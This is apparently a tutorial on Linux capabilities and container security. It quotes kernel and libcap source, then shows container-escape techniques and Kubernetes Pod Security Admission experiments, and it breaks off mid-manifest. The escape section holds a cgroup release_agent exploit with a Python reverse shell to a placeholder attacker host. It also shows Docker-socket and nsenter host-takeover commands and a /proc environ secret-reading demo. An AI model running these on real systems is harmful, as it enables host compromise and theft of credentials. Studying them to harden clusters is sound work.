Capabilities
Capabilities are an additional way to restrict what a process can do, on top of the default rwx permission model. The main userspace tools for working with them are:
setcap
getcap
capsh --print
getpcaps $$
(and others from libcap2 package)
From the official Debian package description:
Libcap implements the user-space interfaces to the POSIX 1003.1e capabilities available in Linux kernels. These capabilities are a partitioning of the all powerful root privilege into a set of distinct privileges.
The Linux man page capabilities(7) lists all available capabilities; let's dive into the source code behind one of them.
One that everyone knows:
CAP_NET_BIND_SERVICE
Bind a socket to Internet domain privileged ports (port numbers less than 1024).
To look at this at a lower level of abstraction we'll use our own program.
By default, a regular user without additional privileges can't run services on ports below 1024:
program.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <unistd.h>
int main(void) {
    int sockfd;
    struct sockaddr_in server_addr;
    /* Create a TCP socket */
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0) {
        perror("Error");
        exit(EXIT_FAILURE);
    }
    /* Zero the address first so that no field is left uninitialized */
    memset(&server_addr, 0, sizeof(server_addr));
    server_addr.sin_family = AF_INET;
    server_addr.sin_addr.s_addr = INADDR_ANY;
    server_addr.sin_port = htons(80);
    /* Binding to a port below 1024 is the privileged step */
    if (bind(sockfd, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
        perror("Error");
        close(sockfd);
        exit(EXIT_FAILURE);
    }
    printf("Done!\n");
    close(sockfd);
    return 0;
}
test@local:~$ gcc program.c -o program
test@local:~$ getcap program
<nothing>
test@local:~$ ./program
Error: Permission denied
root@local:~$ setcap 'cap_net_bind_service=+ep' program
test@local:~$ ./program
Done!
An example of a binary that has a capability set by default:
root@local:~$ getcap /bin/ping
/bin/ping cap_net_raw=ep
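The string that getcap prints can be picked apart mechanically. Below is a minimal Python sketch, assuming a single clause of the form names, operator, flags. The helper name parse_cap_clause is hypothetical, and the real libcap text grammar accepts more than this (several clauses, the "-" operator):

```python
import re

# Letters used in the text form and the sets they refer to.
FLAG_NAMES = {"e": "effective", "p": "permitted", "i": "inheritable"}


def parse_cap_clause(text):
    """Parse one clause such as "cap_net_raw=ep" or "cap_net_bind_service=+ep".

    Assumption: only the operators "=", "=+" and "+" are handled here.
    Returns (list of capability names, set of flag names).
    """
    match = re.fullmatch(r"([a-z_]+(?:,[a-z_]+)*)(=\+?|\+)([eip]+)", text.strip())
    if match is None:
        raise ValueError(f"unsupported capability clause: {text!r}")
    names = match.group(1).split(",")
    flags = {FLAG_NAMES[letter] for letter in match.group(3)}
    return names, flags


if __name__ == "__main__":
    print(parse_cap_clause("cap_net_raw=ep"))
```

So the "ep" on /bin/ping means the capability is placed in both the permitted and the effective set when the file is executed.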
In the source code of libcap2 (the userspace API) we can find the following.
There are 3 kinds of capability sets:
# /cap/cap.go
func (f Flag) String() string {
	switch f {
	case Effective:
		return "e"
	case Permitted:
		return "p"
	case Inheritable:
		return "i"
	default:
		return "<Error>"
	}
}
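Effective - the capabilities currently active for the process; these are the ones the kernel checks
Permitted - the capabilities the process may activate, i.e. move into Effective
Inheritable - the capabilities preserved across execve(); the new program gains them only if the executed file also lists them in its own inheritable set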
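To see these three sets for a live process without libcap, we can decode the CapInh, CapPrm and CapEff hex masks from /proc/<pid>/status. This is a rough Python sketch; decode_caps and read_cap_sets are names made up for the illustration, and the table below follows the bit numbers in the kernel's capability header as far as I know them (bit 0 is cap_chown, bit 10 is cap_net_bind_service):

```python
# Capability names indexed by bit number (assumption: matches linux/capability.h).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]


def decode_caps(mask):
    """Turn a capability bitmask into a list of capability names."""
    return [name for bit, name in enumerate(CAP_NAMES) if (mask >> bit) & 1]


def read_cap_sets(status_text):
    """Extract and decode CapInh/CapPrm/CapEff from /proc/<pid>/status text."""
    sets = {}
    for line in status_text.splitlines():
        key, _, value = line.partition(":")
        if key in ("CapInh", "CapPrm", "CapEff"):
            sets[key] = decode_caps(int(value.strip(), 16))
    return sets
```

On a Linux box, read_cap_sets(open("/proc/self/status").read()) should give the same picture as getpcaps $$ for the current process.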
The full list can be found, for example, in
/cap/names.go
var names = map[Value]string{
	CHOWN: "cap_chown",
	DAC_OVERRIDE: "cap_dac_override",
	DAC_READ_SEARCH: "cap_dac_read_search",
	FOWNER: "cap_fowner",
	FSETID: "cap_fsetid",
	KILL: "cap_kill",
	SETGID: "cap_setgid",
...
In the kernel we can find the following:
/kernel/capability.c
/**
 * sys_capget - get the capabilities of a given process.
 * @header: pointer to struct that contains capability version and
 *	target pid data
 * @dataptr: pointer to struct that contains the effective, permitted,
 *	and inheritable capabilities that are returned
 *
 * Returns 0 on success and < 0 on error.
 */
SYSCALL_DEFINE2(capget, cap_user_header_t, header, cap_user_data_t, dataptr)
{
	int ret = 0;
	pid_t pid;
	unsigned tocopy;
	kernel_cap_t pE, pI, pP;
	struct __user_cap_data_struct kdata[2];
	ret = cap_validate_magic(header, &tocopy);
	if ((dataptr == NULL) || (ret != 0))
		return ((dataptr == NULL) && (ret == -EINVAL)) ? 0 : ret;
	if (get_user(pid, &header->pid))
		return -EFAULT;
	if (pid < 0)
		return -EINVAL;
	ret = cap_get_target_pid(pid, &pE, &pI, &pP);
	if (ret)
		return ret;
	/*
	 * Annoying legacy format with 64-bit capabilities exposed
	 * as two sets of 32-bit fields, so we need to split the
	 * capability values up.
	 */
	kdata[0].effective = pE.val; kdata[1].effective = pE.val >> 32;
	kdata[0].permitted = pP.val; kdata[1].permitted = pP.val >> 32;
	kdata[0].inheritable = pI.val; kdata[1].inheritable = pI.val >> 32;
	/*
	 * Note, in the case, tocopy < _KERNEL_CAPABILITY_U32S,
	 * we silently drop the upper capabilities here. This
	 * has the effect of making older libcap
	 * implementations implicitly drop upper capability
	 * bits when they perform a: capget/modify/capset
	 * sequence.
	 *
	 * This behavior is considered fail-safe
	 * behavior. Upgrading the application to a newer
	 * version of libcap will enable access to the newer
	 * capabilities.
	 *
	 * An alternative would be to return an error here
	 * (-ERANGE), but that causes legacy applications to
	 * unexpectedly fail; the capget/modify/capset aborts
	 * before modification is attempted and the application
	 * fails.
	 */
	if (copy_to_user(dataptr, kdata, tocopy * sizeof(kdata[0])))
		return -EFAULT;
	return 0;
}
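The "annoying legacy format" from the comment above is easy to play with outside the kernel. Here is a small Python sketch of the same split into two 32-bit words, plus what a caller sees when only tocopy words are copied out. The function names are mine and only mirror the arithmetic on kdata[0] and kdata[1]; this is not how libcap itself is written:

```python
MASK32 = 0xFFFFFFFF


def split_caps(value64):
    """Split a 64-bit capability mask into (low word, high word)."""
    return value64 & MASK32, (value64 >> 32) & MASK32


def join_caps(low, high):
    """Rebuild the 64-bit mask from its two 32-bit words."""
    return (high << 32) | low


def visible_caps(value64, tocopy):
    """Mask seen by a caller that receives only the first `tocopy` words."""
    words = split_caps(value64)[:tocopy]
    low = words[0] if len(words) > 0 else 0
    high = words[1] if len(words) > 1 else 0
    return join_caps(low, high)


if __name__ == "__main__":
    # Bit 10 lives in the low word, bit 39 in the high word.
    caps = (1 << 10) | (1 << 39)
    print(hex(visible_caps(caps, 2)), hex(visible_caps(caps, 1)))
```

With tocopy equal to 1 the bit in the upper word silently disappears, which is exactly the fail-safe behavior the kernel comment describes for older libcap versions.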
/kernel/capability.c
/*
 * The only thing that can change the capabilities of the current
 * process is the current process. As such, we can't be in this code
 * at the same time as we are in the process of setting capabilities
 * in this process. The net result is that we can limit our use of
 * locks to when we are reading the caps of another process.
 */
static inline int cap_get_target_pid(pid_t pid, kernel_cap_t *pEp,
				     kernel_cap_t *pIp, kernel_cap_t *pPp)
{
	int ret;
	if (pid && (pid != task_pid_vnr(current))) {
		const struct task_struct *target;
		rcu_read_lock();
		target = find_task_by_vpid(pid);
		if (!target)
			ret = -ESRCH;
		else
			ret = security_capget(target, pEp, pIp, pPp);
		rcu_read_unlock();
	} else
		ret = security_capget(current, pEp, pIp, pPp);
	return ret;
}
/security/security.c
/**
 * security_capget() - Get the capability sets for a process
 * @target: target process
 * @effective: effective capability set
 * @inheritable: inheritable capability set
 * @permitted: permitted capability set
 *
 * Get the @effective, @inheritable, and @permitted capability sets for the
 * @target process. The hook may also perform permission checking to determine
 * if the current process is allowed to see the capability sets of the @target
 * process.
 *
 * Return: Returns 0 if the capability sets were successfully obtained.
 */
int security_capget(const struct task_struct *target,
		    kernel_cap_t *effective,
		    kernel_cap_t *inheritable,
		    kernel_cap_t *permitted)
{
	return call_int_hook(capget, target, effective, inheritable, permitted);
}
/include/linux/lsm_hook_defs.h
LSM_HOOK(int, 0, capget, const struct task_struct *target, kernel_cap_t *effective, kernel_cap_t *inheritable, kernel_cap_t *permitted)
/security/security.c
#define call_int_hook(FUNC, ...) ({				\
	int RC = LSM_RET_DEFAULT(FUNC);				\
	do {							\
		struct security_hook_list *P;			\
		hlist_for_each_entry(P, &security_hook_heads.FUNC, list) { \
			RC = P->hook.FUNC(__VA_ARGS__);		\
			if (RC != LSM_RET_DEFAULT(FUNC))	\
				break;				\
		}						\
	} while (0);						\
	RC;							\
})
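The macro is dense, so here is the same control flow as a tiny Python sketch: walk the registered hooks in order and stop at the first one whose return value differs from the default. Everything here (the hook functions, the "task" argument) is invented for the illustration; only the loop logic follows the macro:

```python
LSM_RET_DEFAULT = 0  # assumption: the default return value of the capget hook is 0


def call_int_hook(hooks, *args, default=LSM_RET_DEFAULT):
    """Call each hook in order; the first non-default result ends the walk."""
    rc = default
    for hook in hooks:
        rc = hook(*args)
        if rc != default:
            break
    return rc


calls = []


def allow(target):
    calls.append("allow")
    return 0


def deny(target):
    calls.append("deny")
    return -13  # -EACCES


def never_reached(target):
    calls.append("never_reached")
    return 0


result = call_int_hook([allow, deny, never_reached], "task")
```

In this run the third hook is never called, because deny already returned a non-default value. For capget the capability module registers cap_capget, which simply fills in the sets and returns 0.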
/security/commoncap.c
static struct security_hook_list capability_hooks[] __ro_after_init = {
	LSM_HOOK_INIT(capable, cap_capable),
	LSM_HOOK_INIT(settime, cap_settime),
	LSM_HOOK_INIT(ptrace_access_check, cap_ptrace_access_check),
	LSM_HOOK_INIT(ptrace_traceme, cap_ptrace_traceme),
	LSM_HOOK_INIT(capget, cap_capget),
	LSM_HOOK_INIT(capset, cap_capset),
	LSM_HOOK_INIT(bprm_creds_from_file, cap_bprm_creds_from_file),
	LSM_HOOK_INIT(inode_need_killpriv, cap_inode_need_killpriv),
	LSM_HOOK_INIT(inode_killpriv, cap_inode_killpriv),
	LSM_HOOK_INIT(inode_getsecurity, cap_inode_getsecurity),
	LSM_HOOK_INIT(mmap_addr, cap_mmap_addr),
	LSM_HOOK_INIT(mmap_file, cap_mmap_file),
	LSM_HOOK_INIT(task_fix_setuid, cap_task_fix_setuid),
	LSM_HOOK_INIT(task_prctl, cap_task_prctl),
	LSM_HOOK_INIT(task_setscheduler, cap_task_setscheduler),
	LSM_HOOK_INIT(task_setioprio, cap_task_setioprio),
	LSM_HOOK_INIT(task_setnice, cap_task_setnice),
	LSM_HOOK_INIT(vm_enough_memory, cap_vm_enough_memory),
};
/include/linux/lsm_hooks.h
#define LSM_HOOK_INIT(HEAD, HOOK) { .head = &security_hook_heads.HEAD, .hook = { .HEAD = HOOK } }
/security/commoncap.c
/**
 * cap_capget - Retrieve a task's capability sets
 * @target: The task from which to retrieve the capability sets
 * @effective: The place to record the effective set
 * @inheritable: The place to record the inheritable set
 * @permitted: The place to record the permitted set
 *
 * This function retrieves the capabilities of the nominated task and returns
 * them to the caller.
 */
int cap_capget(const struct task_struct *target, kernel_cap_t *effective,
	       kernel_cap_t *inheritable, kernel_cap_t *permitted)
{
	const struct cred *cred;
	/* Derived from kernel/capability.c:sys_capget. */
	rcu_read_lock();
	cred = __task_cred(target);
	*effective = cred->cap_effective;
	*inheritable = cred->cap_inheritable;
	*permitted = cred->cap_permitted;
	rcu_read_unlock();
	return 0;
}
/include/linux/cred.h
struct cred {
	atomic_long_t usage;
	kuid_t uid; /* real UID of the task */
	kgid_t gid; /* real GID of the task */
	kuid_t suid; /* saved UID of the task */
	kgid_t sgid; /* saved GID of the task */
	kuid_t euid; /* effective UID of the task */
	kgid_t egid; /* effective GID of the task */
	kuid_t fsuid; /* UID for VFS ops */
	kgid_t fsgid; /* GID for VFS ops */
	unsigned securebits; /* SUID-less security management */
	kernel_cap_t cap_inheritable; /* caps our children can inherit */
	kernel_cap_t cap_permitted; /* caps we're permitted */
	kernel_cap_t cap_effective; /* caps we can actually use */
	kernel_cap_t cap_bset; /* capability bounding set */
	kernel_cap_t cap_ambient; /* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char jit_keyring; /* default keyring to attach requested
				    * keys to */
	struct key *session_keyring; /* keyring inherited over fork */
	struct key *process_keyring; /* keyring private to this process */
	struct key *thread_keyring; /* keyring private to this thread */
	struct key *request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void *security; /* LSM security */
#endif
	struct user_struct *user; /* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct ucounts *ucounts;
	struct group_info *group_info; /* supplementary groups for euid/fsgid */
	/* RCU deletion */
	union {
		int non_rcu; /* Can we skip RCU deletion? */
		struct rcu_head rcu; /* RCU deletion hook */
	};
} __randomize_layout;
Container escape abuse examples
If the container runs in privileged mode, we may see something like:
> capsh --print
Current: = cap_chown, cap_sys_module, cap_sys_chroot, cap_sys_admin, cap_setgid,cap_setuid
cap_sys_admin allows mounting filesystems, which is what the classic cgroup v1 release_agent escape relies on:
> mkdir /tmp/expl
> mount -t cgroup -o rdma cgroup /tmp/expl
> mkdir /tmp/expl/x
> echo 1 > /tmp/expl/x/notify_on_release
> host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
> echo "$host_path/exploit" > /tmp/expl/release_agent
> cat > /exploit << EOF
#!/bin/bash
export RHOST="ATTACKIP";export RPORT=31337;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
EOF
> chmod a+x /exploit
> sh -c "echo \$\$ > /tmp/expl/x/cgroup.procs"
If the Docker socket is exposed inside the container:
docker run -it --rm -v /:/host alpine chroot /host sh
Even though we are already inside a container, the socket belongs to the daemon on the host. So when we mount / through it, we get the host's root filesystem, no matter how many levels of containers deep we are.
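From the defender's side, it is worth checking whether a container can see such a socket at all. A minimal Python sketch, assuming the usual default locations /var/run/docker.sock and /run/docker.sock (other setups may place it elsewhere); is_unix_socket and find_docker_sockets are hypothetical helper names:

```python
import os
import stat

# Assumption: common default paths of the Docker daemon socket.
DEFAULT_CANDIDATES = ("/var/run/docker.sock", "/run/docker.sock")


def is_unix_socket(path):
    """Return True if `path` exists and is a Unix domain socket."""
    try:
        return stat.S_ISSOCK(os.stat(path).st_mode)
    except OSError:
        return False


def find_docker_sockets(candidates=DEFAULT_CANDIDATES):
    """List the candidate paths that are sockets in this filesystem view."""
    return [path for path in candidates if is_unix_socket(path)]


if __name__ == "__main__":
    print(find_docker_sockets())
```

A non-empty result inside a container means that anything running there can talk to the host daemon and start the chroot trick shown above.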
If the Docker daemon is exposed over TCP (for example for remote administration from Portainer or Jenkins), usually on port 2375:
docker -H tcp://REMOTEIP:2375 ps
docker -H tcp://REMOTEIP:2375 run -it --rm -v /:/host alpine chroot /host sh
Namespaces abuse:
nsenter --target 1 --mount --uts --ipc --net /bin/bash
This switches us into the namespaces of the PID 1 process (the host's init, provided that we can see the host PID namespace)
Cgroups
Check which cgroups version is in use (the directory structure differs, so we need to know :) )
mount | grep cgroup
If the filesystem type is cgroup2, it is v2
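The same check can be scripted. This is a small Python sketch that reads text in the /proc/mounts format (device, mount point, filesystem type, options) rather than the output of mount; cgroup_versions is a made-up name:

```python
def cgroup_versions(mounts_text):
    """Return the set of cgroup versions found in /proc/mounts-style text."""
    versions = set()
    for line in mounts_text.splitlines():
        fields = line.split()
        if len(fields) < 3:
            continue
        fstype = fields[2]  # third column is the filesystem type
        if fstype == "cgroup2":
            versions.add(2)
        elif fstype == "cgroup":
            versions.add(1)
    return versions
```

Calling cgroup_versions(open("/proc/mounts").read()) on a host gives {2} for a pure v2 setup; a result containing both 1 and 2 would point to a hybrid layout.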
Create our own cgroup:
sudo mkdir /sys/fs/cgroup/custom_cgroup
Limit memory(50MB):
echo $((50 * 1024 * 1024)) | sudo tee /sys/fs/cgroup/custom_cgroup/memory.max
Start a new process in the cgroup, or just write our current PID into our cgroup's cgroup.procs:
echo $$ | sudo tee /sys/fs/cgroup/custom_cgroup/cgroup.procs
Run a test:
stress --vm-bytes 49M --vm-keep -m 1
> OK
stress --vm-bytes 100M --vm-keep -m 1
We get something like this (the OOM killer kills us):
stress: info: [247560] dispatching hogs: 0 cpu, 0 io, 1 vm, 0 hdd
stress: FAIL: [247560] (425) <-- worker 247561 got signal 9
stress: WARN: [247560] (427) now reaping child worker processes
stress: FAIL: [247560] (461) failed run completed in 0s
Check stats:
cat /sys/fs/cgroup/custom_cgroup/memory.events
low 0
high 0
max 13539
oom 4
oom_kill 4
oom_group_kill 0
(I ran it 4 times, hence oom_kill 4)
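If we want to watch these counters from a script, memory.events is just "name value" pairs. A rough Python sketch; parse_memory_events and mib are illustrative helpers, and the sample text is the output shown above:

```python
def mib(n):
    """Convert MiB to bytes, as in the $((50 * 1024 * 1024)) shell expression."""
    return n * 1024 * 1024


def parse_memory_events(text):
    """Parse the content of a cgroup v2 memory.events file into a dict."""
    events = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2:
            events[parts[0]] = int(parts[1])
    return events


SAMPLE = """low 0
high 0
max 13539
oom 4
oom_kill 4
oom_group_kill 0
"""

events = parse_memory_events(SAMPLE)
```

Here events["oom_kill"] matches the four failed stress runs, and mib(50) is the value that was written to memory.max.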
Links / Resources
Linux Capabilities: making them work
Kubernetes Escapes / Pod Privilege Escalations
The experiments were taken from here
The examples and experiments in the article were made with PSP (Pod Security Policies). This technology is now deprecated
Removed feature
PodSecurityPolicy was deprecated in Kubernetes v1.21, and removed from Kubernetes in v1.25.
My cluster runs Kubernetes v1.30.4, so we have to use PSA (Pod Security Admission) instead
All the pod configs from the article still work, so if we set:
spec:
  hostPID: true
it will work, but the current Kubernetes approach to security is to control such settings via PSA
So how should it be done now? Here is how
We define security profiles for namespaces (not for individual pods), and there are 3 predefined levels:
- privileged (allowed):
  - Privileged containers: a pod can be run with the privileged: true flag
  - Host access: parameters such as hostPID: true, hostIPC: true, hostNetwork: true and binding to host ports are allowed
  - Running with root privileges: containers can run as the root user (runAsUser=0) without any restrictions
  - Mounting sensitive file systems: mounting volumes like hostPath, proc and others that provide direct access to the host file system is allowed
  - Unprotected capabilities: all Linux capabilities, such as CAP_SYS_ADMIN or CAP_NET_ADMIN, are allowed
- baseline (allowed):
  - Normal containers: containers can run as both root and unprivileged users, but explicitly enabling privileged mode is forbidden (privileged: false)
  - Limited access to host resources: parameters such as hostPID, hostIPC, hostNetwork and hostPorts are denied by default
  - Partial access to capabilities: only safe capabilities such as CAP_CHOWN, CAP_SETUID, CAP_SETGID are allowed, while unsafe capabilities such as CAP_SYS_ADMIN are prohibited
  - Mounting safe volumes: standard volume types are allowed, but volumes of type hostPath, which provide access to the host file system, are forbidden
  - Running containers as root user: allowed by default, but it is recommended to avoid this by using runAsNonRoot
- restricted (forbidden):
  - Privileged containers: the use of privileged: true is completely prohibited
  - Access to host resources: hostPID, hostIPC, hostNetwork and the use of host ports are completely prohibited
  - Run as root: containers must run as non-root, with the runAsNonRoot: true parameter
  - Mounting file systems: mounting unsafe volumes such as hostPath is prohibited; only standard, secure volume types are allowed
  - Restricted capabilities: containers cannot request extended privileges such as CAP_SYS_ADMIN and other high-risk capabilities
- restricted (allowed):
  - Unprivileged containers: containers can only be run with the minimum required privileges
  - Running as a non-root user: use of runAsNonRoot is mandatory
  - Enhanced security: requirements for AppArmor, seccomp and other security mechanisms (if enabled)
We also have 3 modes, which are set as namespace labels; the names speak for themselves:
- enforce - policy violations will cause the pod to be rejected
- audit - policy violations will trigger the addition of an audit annotation to the event recorded in the audit log, but are otherwise allowed
- warn - policy violations will trigger a user-facing warning, but are otherwise allowed
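Each mode becomes a label of the form pod-security.kubernetes.io/<mode>: <level> on the namespace. Below is a small Python sketch that builds such a namespace manifest as a dict; psa_labels and namespace_manifest are hypothetical helpers, and the validation only covers the three levels and three modes listed above:

```python
import json

LEVELS = ("privileged", "baseline", "restricted")
MODES = ("enforce", "audit", "warn")
PREFIX = "pod-security.kubernetes.io/"


def psa_labels(**modes):
    """Build PSA labels, e.g. psa_labels(enforce="restricted")."""
    labels = {}
    for mode, level in modes.items():
        if mode not in MODES:
            raise ValueError(f"unknown mode: {mode}")
        if level not in LEVELS:
            raise ValueError(f"unknown level: {level}")
        labels[PREFIX + mode] = level
    return labels


def namespace_manifest(name, **modes):
    """Return a Namespace manifest carrying the requested PSA labels."""
    return {
        "apiVersion": "v1",
        "kind": "Namespace",
        "metadata": {"name": name, "labels": psa_labels(**modes)},
    }


if __name__ == "__main__":
    manifest = namespace_manifest("vuln-psa-ns", enforce="restricted", warn="restricted")
    print(json.dumps(manifest, indent=2))
```

kubectl accepts JSON as well as YAML, so the printed manifest can be saved to a file and applied as is.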
Experiments
We will create a namespace and a pod and change its properties
ns.yml
apiVersion: v1
kind: Namespace
metadata:
  name: vuln-psa-ns
attacker.yml
apiVersion: v1
kind: Pod
metadata:
  name: attacker
  namespace: vuln-psa-ns
spec:
  containers:
  - name: attacker
    image: ubuntu
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "while true; do sleep 30; done;" ]
  nodeName: worker
Now let's go through the list from the article and adapt the PSP examples to PSA, which is what is used today
hostPID
We can access the host's list of PIDs if we set hostPID: true in the spec
This allows us to read the environments of processes that belong to other pods on the node, and to kill processes
...
spec:
  hostPID: true
...
If we do nothing with the namespace and do not assign any labels, we can simply run it and profit:
> kubectl -n vuln-psa-ns exec -it pods/hostpid-pod -- ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 170336 12704 ? Ss Aug11 1:49 /sbin/init
root 2 0.0 0.0 0 0 ? S Aug11 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S Aug11 0:00 [pool_workque
root 4 0.0 0.0 0 0 ? I< Aug11 0:00 [kworker/R-rc
root 5 0.0 0.0 0 0 ? I< Aug11 0:00 [kworker/R-rc
root 6 0.0 0.0 0 0 ? I< Aug11 0:00 [kworker/R-sl
root 7 0.0 0.0 0 0 ? I< Aug11 0:00 [kworker/R-ne
root 9 0.0 0.0 0 0 ? I< Aug11 0:00 [kworker/0:0H
root 11 0.0 0.0 0 0 ? I Aug11 0:00 [kworker/u8:0
root 12 0.0 0.0 0 0 ? I< Aug11 0:00 [kworker/R-mm
root 13 0.0 0.0 0 0 ? I Aug11 0:00 [rcu_tasks_kt
root 14 0.0 0.0 0 0 ? I Aug11 0:00 [rcu_tasks_ru
root 15 0.0 0.0 0 0 ? I Aug11 0:00 [rcu_tasks_tr
root 16 0.0 0.0 0 0 ? S Aug11 0:05 [ksoftirqd/0]
...
To test our ability to steal environment variables, we can create another pod (in the default namespace, it doesn't matter) and read its /proc/<pid>/environ file (obviously, both pods have to be on the same node):
victim.yml
apiVersion: v1
kind: Pod
metadata:
  name: victim
spec:
  containers:
  - name: victim
    image: ubuntu
    command: [ "/bin/bash", "-c", "--" ]
    args: [ "FLAG=supersecret sleep 9999999" ]
  nodeName: worker
kubectl -n vuln-psa-ns exec -it pods/hostpid-pod -- bash
root@hostpid-pod:/# ps aux | grep 999
root 1549154 0.0 0.0 2384 1024 ? Ss 20:17 0:00 sleep 9999999
root@hostpid-pod:/# grep -a "FLAG" /proc/1549154/environ
FLAG=supersecretKUBERNETES_SERVICE_PORT_HTTPS=443KUBERNETES_S....
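The variables look glued together because /proc/<pid>/environ separates entries with NUL bytes, which the terminal does not show. A minimal Python sketch that splits such a blob into a dict; parse_environ is a name made up for the example, and the sample bytes imitate the output above:

```python
def parse_environ(raw):
    """Split the NUL-separated content of /proc/<pid>/environ into a dict."""
    env = {}
    for entry in raw.split(b"\0"):
        if not entry:
            continue
        key, sep, value = entry.partition(b"=")
        if sep:
            env[key.decode(errors="replace")] = value.decode(errors="replace")
    return env


sample = b"FLAG=supersecret\0KUBERNETES_SERVICE_PORT_HTTPS=443\0"
env = parse_environ(sample)
```

Against a real process, the input would be open("/proc/<pid>/environ", "rb").read(), which is readable here only because the attacker pod runs as root in the host PID namespace.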
Now let's add labels to our namespace config:
- If we add pod-security.kubernetes.io/enforce: privileged, nothing changes: we can still do all of the above
- If we add pod-security.kubernetes.io/warn: restricted, we get a warning, but the pod is still created:
  kubectl create -f attacker.yml
  Warning: would violate PodSecurity "restricted:latest": allowPrivilegeEscalation != false (container "attacker" must set securityContext.allowPrivilegeEscalation=false), unrestricted capabilities (container "attacker" must set securityContext.capabilities.drop=["ALL"]), runAsNonRoot != true (pod or container "attacker" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "attacker" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost")
  pod/attacker created
  So from now on we'll use just enforce: privileged or enforce: restricted, because we are testing :)
- And if we set pod-security.kubernetes.io/enforce: restricted:
  kubectl apply -f attacker.yml
  Error from server (Forbidden): error when creating "attacker.yml": pods "attacker" is forbidden: violates PodSecurity "restricted:latest": allowPrivilegeEscalation != false (container "attacker" must set securityContext.allowPrivilegeEscalation=false), unrestricted capabilities (container "attacker" must set securityContext.capabilities.drop=["ALL"]), runAsNonRoot != true (pod or container "attacker" must set securityContext.runAsNonRoot=true), seccompProfile (pod or container "attacker" must set securityContext.seccompProfile.type to "RuntimeDefault" or "Localhost")
  And the pod is not created
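The four complaints in that message can be reproduced offline. The Python sketch below checks a pod dict against only these four rules; it is a simplified illustration and not the real admission controller, which checks more fields (host namespaces, volume types and so on). restricted_violations is a hypothetical helper:

```python
def restricted_violations(pod):
    """Return the subset of "restricted" violations seen in the message above."""
    spec = pod.get("spec", {})
    pod_ctx = spec.get("securityContext") or {}
    violations = []
    for container in spec.get("containers", []):
        name = container.get("name", "?")
        ctx = container.get("securityContext") or {}
        if ctx.get("allowPrivilegeEscalation") is not False:
            violations.append(f"{name}: allowPrivilegeEscalation != false")
        drop = (ctx.get("capabilities") or {}).get("drop") or []
        if "ALL" not in drop:
            violations.append(f"{name}: unrestricted capabilities")
        # A container-level value takes precedence over the pod-level one.
        if ctx.get("runAsNonRoot", pod_ctx.get("runAsNonRoot")) is not True:
            violations.append(f"{name}: runAsNonRoot != true")
        seccomp = ctx.get("seccompProfile") or pod_ctx.get("seccompProfile") or {}
        if seccomp.get("type") not in ("RuntimeDefault", "Localhost"):
            violations.append(f"{name}: seccompProfile")
    return violations


# The attacker pod from attacker.yml, without any securityContext.
attacker = {
    "spec": {
        "containers": [{"name": "attacker", "image": "ubuntu"}],
        "nodeName": "worker",
    }
}
found = restricted_violations(attacker)
```

For the attacker pod this reports all four problems, in the same order as the kubectl output.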
hostNetwork
victim1.yml
apiVersion: v1
kind: Pod
metadata:
  name: victim1
  labels:
    app: victim1
  namespace: vuln-psa-ns
spec:
  containers:
  - name: victim1
    image: ubuntu
    command: [ "/bin/bash", "-c", "--" ]
    args: [ "apt update && DEBIAN_FRONTEND=noninteractive apt install -y python3 && python3 -m http.server 8080" ]
  nodeName: worker
---
apiVersion: v1
kind: Service
metadata:
  name: victim1
  namespace: vuln-psa-ns
spec:
  selector:
    app: victim1
  ports:
  - protocol: TCP
    port: 8080
    targetPort: 8080
  type: ClusterIP
On victim1 we have a Python HTTP server:
root@victim1:/# netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 1/python3
root@victim1:/# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1450
inet 10.42.2.60 netmask 255.255.255.0 broadcast 10.42.2.255
inet6 fe80::8420:9aff:fe6f:b378 prefixlen 64 scopeid 0x20<link>
ether 86:20:9a:6f:b3:78 txqueuelen 0 (Ethernet)
RX packets 26414 bytes 38519569 (38.5 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 11444 bytes 881368 (881.3 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
On victim2 we will periodically send POST requests with secret data to our victim1
victim2.yml
apiVersion: v1
kind: Pod
metadata:
  name: victim2
  namespace: vuln-psa-ns
spec:
  containers:
  - name: victim2
    image: ubuntu
    command: [ "/bin/bash", "-c", "--" ]
    args: [ "apt update && DEBIAN_FRONTEND=noninteractive apt install -y curl; while true; do curl -H 'Content-Type: application/json' -d '{ \"admin\":\"admin\", \"password\":\"Sup3r_S3cr3t\" }' -X POST victim1:8080; sleep 2; done" ]
  nodeName: worker
And now the attacker:
apiVersion: v1
kind: Pod
metadata:
